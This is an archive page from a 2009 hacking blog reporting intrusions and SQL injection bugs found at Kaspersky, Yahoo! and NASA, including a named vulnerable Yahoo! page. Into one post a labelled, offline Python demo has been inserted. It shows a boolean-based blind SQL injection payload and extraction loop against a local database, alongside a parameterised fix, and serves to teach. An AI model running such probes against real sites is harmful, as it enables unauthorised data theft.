Archive for the ‘English News’ Category
Posted on December 3rd, 2009
After the big scandal regarding the usa.kaspersky.com data breach, first posted here on hackersblog by our former member “unu”, TinKode, a rising grey-hat pentester, strikes a new domain of this security vendor. Probably we will see a new wave of information and discussions about this subject on the web, and another uber specialist will come and make a crappy security audit that leaves Cross Site Scripting vulnerabilities open.
Here is the original source with delicious details about this intrusion.
Posted on November 24th, 2009
Posted on November 13th, 2009
This vulnerability was patched, but I don’t know why the screenshots uploaded by TinKode on imageshack were deleted. Maybe TinKode will provide me those screenshots again.
Anyway, the bug was located at http://careers.yahoo.com/eprofiles.php?id=
Posted on November 13th, 2009
Posted on October 27th, 2009
Posted on October 23rd, 2009
TinKode reported to us another SQL injection vulnerability in one of Yahoo!’s subdomains. From what I saw looking at the screenshots he provided, it’s another blind SQL injection but, since we no longer test high-risk bugs in other people’s systems without the owners’ consent, I couldn’t say for sure how much damage a possible attacker could do if this vulnerability were exploited.
This is not the first and probably not the last SQL injection vulnerability discovered by a Romanian pentester in Yahoo! subdomains. Looking back at our articles, we can see that Yahoo! is dealing with a big list of vulns, too many for a huge company with billions of members. We are not here to judge them, but this is a fact: Yahoo! needs a full security audit to prevent these things from happening so often.
The first time it was a big “wooow” for us to find a SQL injection vuln in their domains, but now this is too damn usual. It’s like we are talking about Yahoo! XSSs: everybody can have or discover a piece of that, even a 12-year-old kid with 6 months of experience in the “hacking” business. And this is sad. I can handle XSS attacks, I can protect my ass against them, but it’s impossible to mitigate a SQL injection from my user side. This is what worries me right now. But enough with this emo speech.
Yahoo! staff were notified and we are waiting to see the vulnerability fixed before the screenshots are made public on HackersBlog.
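The bug class this post talks about, shown as an added example that is not code from the original page, from Yahoo! or from TinKode: a constructed lookup handler that splices a query-string `id` straight into SQL, a boolean-based blind probe that reads a secret out of it one character at a time using nothing but the page's found/not-found answer, and the same handler with a bound parameter, on which the probe gets nothing. The `profiles`/`users` schema, the column names and the secret value are all assumptions made for the demo; it runs offline against an in-memory SQLite database.

```python
"""Added example, not from the original post or any site it names.

A blind SQL injection gives the attacker no data in the response, only a
yes/no signal (page found / page empty). That is still enough to read the
whole database: ask one true/false question per character. The fix lives
only on the server side, which is why a user cannot mitigate it.
"""
import sqlite3

SECRET = "s3cr3t"  # constructed demo value the attacker wants to read
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"  # assumed charset of the secret


def make_db():
    """Constructed demo schema: a public profile table and a private users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE profiles (id INTEGER PRIMARY KEY, name TEXT)")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, pw TEXT)")
    con.execute("INSERT INTO profiles VALUES (1, 'alice'), (2, 'bob')")
    con.execute("INSERT INTO users VALUES (1, ?)", (SECRET,))
    return con


def vulnerable_handler(con, id_param):
    """Models a page like .../eprofiles.php?id=: the parameter is spliced
    into the SQL text. Returns only whether a profile was found, so the
    attacker never sees data directly (a blind injection)."""
    sql = "SELECT name FROM profiles WHERE id = " + id_param
    row = con.execute(sql).fetchone()
    return row is not None


def fixed_handler(con, id_param):
    """Hardened form: validate the type and bind the value. The database
    driver never parses the parameter as SQL, so injected conditions are
    not evaluated."""
    try:
        id_val = int(id_param)
    except ValueError:
        return False  # not a valid id: treat as "not found"
    row = con.execute(
        "SELECT name FROM profiles WHERE id = ?", (id_val,)
    ).fetchone()
    return row is not None


def blind_extract(oracle, max_len=16):
    """Boolean-based blind extraction. `oracle(payload)` returns True when
    the page reports a hit. Each payload keeps the real row (id = 1) and
    ANDs on a guess about one character of the secret; the page is only
    "found" when the guess is right. A position where no character matches
    is taken as the end of the string."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            payload = (
                f"1 AND (SELECT substr(pw,{pos},1) FROM users WHERE id=1) = '{ch}'"
            )
            if oracle(payload):
                found += ch
                break
        else:
            break  # no match at this position: end of secret (or charset exhausted)
    return found


if __name__ == "__main__":
    con = make_db()
    leaked = blind_extract(lambda p: vulnerable_handler(con, p))
    safe = blind_extract(lambda p: fixed_handler(con, p))
    print("vulnerable handler leaked:", repr(leaked))
    print("parameterised handler leaked:", repr(safe))
```

Each character costs at most `len(ALPHABET)` requests, so a short secret is recovered in a few hundred page loads; real tools cut that further with binary search on the character code. The parameterised handler returns "not found" for every probe, which is exactly the property the user cannot enforce from the browser side.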
Posted on October 22nd, 2009
Those two(?) vulnerabilities are NOT confirmed. Read more about usa.kaspersky.com vulnerabilities here.
Source: http://rstcenter.com/forum/17628-kaspersky.rst
Credit: NeOh
Posted on October 14th, 2009
Posted on October 11th, 2009
Screenshots:
- http://i44.tinypic.com/vnjl10.png
- http://i41.tinypic.com/25j9zle.png
- http://i37.tinypic.com/294t26t.png
- http://i35.tinypic.com/qnpf9y.png
- http://i38.tinypic.com/23r5mw.png
- http://i37.tinypic.com/2rfe92u.png
- http://i35.tinypic.com/a57s5e.png
Author: TinKode a.k.a. cOde.breaker
Video/screenshots source: http://rstcenter.com/forum/17443-nasa-gov-proof.rst